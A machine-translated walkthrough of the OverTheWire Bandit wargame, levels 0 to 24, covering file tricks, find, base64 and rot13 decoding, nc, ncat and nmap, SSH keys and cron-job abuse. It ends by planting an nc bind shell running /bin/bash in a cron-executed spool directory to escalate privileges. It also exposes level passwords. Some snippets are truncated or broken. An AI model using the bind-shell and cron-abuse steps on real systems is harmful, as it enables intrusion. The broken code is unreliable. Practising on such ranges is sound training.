Wargames customs clearance notes - Bandit

Range link: https://overthewire.org/wargames/
In the process, most of them will not directly appear the customs clearance password, which may be attached at the end of the text

ssh bandit0@bandit.labs.overthewire.org -p 2220

Then enter the password according to the prompt and log in successfully

cat readme

You can get the next level login password

ssh bandit1@bandit.labs.overthewire.org -p 2220

ls found a file named "-"
Direct cat - no echo found
The reason is that many Linux system parameters start with "-", and the system is waiting for input parameters
Use the absolute path of the file or specify the current directory to successfully read the next level password in the file

cat /home/bandit1/-


cat ./-

ssh bandit2@bandit.labs.overthewire.org -p 2220

ls displays the file name as "spaces in this filename"
Copy file name cat echo directly

cat: spaces: No such file or directory
cat: in: No such file or directory
cat: this: No such file or directory
cat: filename: No such file or directory

Spaces in file names are recognized as multiple files
Use the tab key to complete the file name to obtain the next level password

cat spaces\ in\ this\ filename

cat inhere/.hidden 

Get next level login password

bandit4@bandit:~/inhere$ file ./-file0*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data

Only "- file07" text, use cat here / - file07 to obtain the next level password

1033 bytes in size
not executable

Here, find is used to find the file according to the prompt content. Several find parameters will be used

-type [bcdpflsD]
-size N[bcwkMG]
-size n : 
The file size is n Company
b Block representing 512 bytes
c Represents the number of characters
k express kilo bytes
w Is two bytes

-type c : 
The file type is c Documents
d: catalogue
c: Font device file
b: Block device file
p: Named storage
f: General documents
l: symbolic link 
s: socket

Use find search according to the above content and tips

bandit5@bandit:~$ find inhere/ -type f -size 1033c

Echo only in here / maybehere07 / File2 qualified

cat inhere/maybehere07/.file2

Get next level password

owned by user bandit7
owned by group bandit6
33 bytes in size

The search criteria still need to be built, and the find parameter needs to be used here

-size N[bcwkMG]
-user NAME

I didn't find the '- group' parameter in find --help, but according to the '- user' guess, there is verification. Use

find / -user bandit7 -group bandit6 -size 33c

When searching for files that match the content, there are many error echo messages, which should be due to insufficient user permissions. Among them, there is only one normal echo / var / lib / dpkg / Info / bandit7 Password is the file to be found

cat /var/lib/dpkg/info/bandit7.password

Get the next level password

catcat data.txt |grep millionth

Get next level password

def LoadStr(url):
    text = open(url)
    key = text.read().split("\n")
    return key

def CompareKey(content):
    count = [0 for x in range(0, 1001)]
    for i in range(len(content)):
        for j in range(len(content)):
            # print(content[1])
            if content[i] == content[j]:
                count[i] = count[i] + 1
                j = j + 1
    return count

if __name__ == "__main__":
    key_url = "/Users/zhaohg/Downloads/str_key.txt"
    key_content = LoadStr(key_url)
    key_count = CompareKey(key_content)
    # print(key_count)
    for i in range(len(key_count)):
        if key_count[i] == 1:

The script is very rough... Results after operation


strings data.txt |grep ==

You can see the next level password

import base64
str_b64 = 'VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg=='

str_decode = base64.b64decode(str_b64)

Get the next level password after execution

cat data.txt |tr a-zA-Z n-za-mN-ZA-M

Execute to get the next level password

ssh bandit14@localhost  -i sshkey.private

Then check the password of bandit14 user according to the file location prompted by the title

bandit14@bandit:~$ cat /etc/bandit_pass/bandit14 

bandit14@bandit:~$ nc localhost 30000

Correct below is the next level password

bandit15@bandit:~$ ncat --ssl localhost 30001

Similarly, Correct is the next level password

bandit16@bandit:~$ nmap localhost -p 31000-32000

Starting Nmap 7.40 ( https://nmap.org ) at 2022-02-08 08:37 CET
Nmap scan report for localhost (
Host is up (0.00022s latency).
Not shown: 996 closed ports
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown

Not many, so you can try one by one with a higher-level method

bandit16@bandit:~$ ncat --ssl localhost 31790

Finally, an ssl private key is returned, which is the certificate used to log in to the next level user

ssh bandit17@bandit.labs.overthewire.org -p 2220 -i privatekey 

Then the login fails and an error message is given

Permissions 0644 for 'privatekey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "privatekey": bad permissions

If the private key permission can be modified, it is not recognized. If the permission to modify the private key is 400, you can log in
After successful login, there are two password texts. Follow the prompts and try again And Chinese new What is different in old is the next level user password. Here, use the diff command to compare the two files

bandit17@bandit:~$ diff passwords.new passwords.old 
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
> w0Yfolrc5bwjS4qw5mq1nnQi6mF03bii

Directly obtain the password of the next level user
Because we log in with the private key, according to the previous rules, we can use bandit17 users to view their passwords for convenience

bandit17@bandit:~$ cat /etc/bandit_pass/bandit17

root@Zhaohg-Server:~# scp -P 2220 bandit18@bandit.labs.overthewire.org:~/readme ~/
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password: 
readme                                                                                                         100%   33     0.2KB/s   00:00    

The password can be obtained by viewing the readme file locally

bandit19@bandit:~$ ./bandit20-do id
uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11019(bandit19)

Here you can use this command to directly cat the password of the next level user

./bandit20-do cat /etc/bandit_pass/bandit20

nc -l localhost -p 50001

The given linker is then executed on the second connection

./suconnect 50001

At this time, return to the connection using nc, enter the password of bandit20, and the next level password will be returned

nc Connection echo of:
bandit20@bandit:~$ nc -l localhost -p 50001

suconnect Connection echo of:
bandit20@bandit:~$ ./suconnect 50001
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password

bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

Found the path of the execution file. Check this Contents of sh file

bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh 
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

It is found that the timing task writes the password of bandit22 in / tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv and modifies the permissions. All users can read this file
Get the password directly from cat

 cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

Or view the content of scheduled task execution

bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh

mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

The key point is that as long as you get the value of 'mytarget', you can get the password of bandit23. It is known that the value of 'myname' is' bandit23 ', so you can directly get the value of' mytarget 'locally

root@Zhaohg-Server:~# mytarget=$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)
root@Zhaohg-Server:~# echo $mytarget

Then directly follow the path in the script and the password of the corresponding position of cat

cat /tmp/8ca319486bfbbc3663ea0fbe81326349

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh


cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
    if [ "$i" != "." -a "$i" != ".." ];
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        rm -f ./$i

It is found that the bandit24 directory has writable and executable permissions, and the files of the bandit23 user will be executed by the scheduled task

bandit23@bandit:~$ ls -l /var/spool/
total 12
drwxrwx-wx 83 root bandit24 4096 Feb  8 10:02 bandit24

The idea is to use bandit23 users to upload executable files to this directory, and the scheduled tasks will be executed with bandit24 permission, so you can cat / etc / bandit_ Password in pass / bandit24
I tried to redirect the cat content directly to the bandit23 directory. The permission is not enough, so I used the rebound shell.
First upload the nc rebound shell script to the / var/spool/bandit24 / directory
Script content:

#! /bin/bash
nc -lvp 50001 -e /bin/bash

Upload command:

root@Zhaohg-Server:~# scp -P 2220 /root/catkey.sh bandit23@bandit.labs.overthewire.org:/var/spool/bandit24/catkey.sh 
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit23@bandit.labs.overthewire.org's password: 
catkey.sh                                                                                                     100%   42     0.2KB/s   00:00    

Then modify catkey in bandit23 The SH permission is 777

chmod 777  /var/spool/bandit24/catkey.sh

Wait for a while and connect to the 50001 port of the rebound shell with nc

nc localhost 50001

At this time, you can find that the permission is already the permission of bandit24, and you can get the password

uid=11024(bandit24) gid=11024(bandit24) groups=11024(bandit24)

cat /etc/bandit_pass/bandit24

Keywords: Linux server security

Added by Iceman512 on Tue, 08 Feb 2022 17:18:16 +0200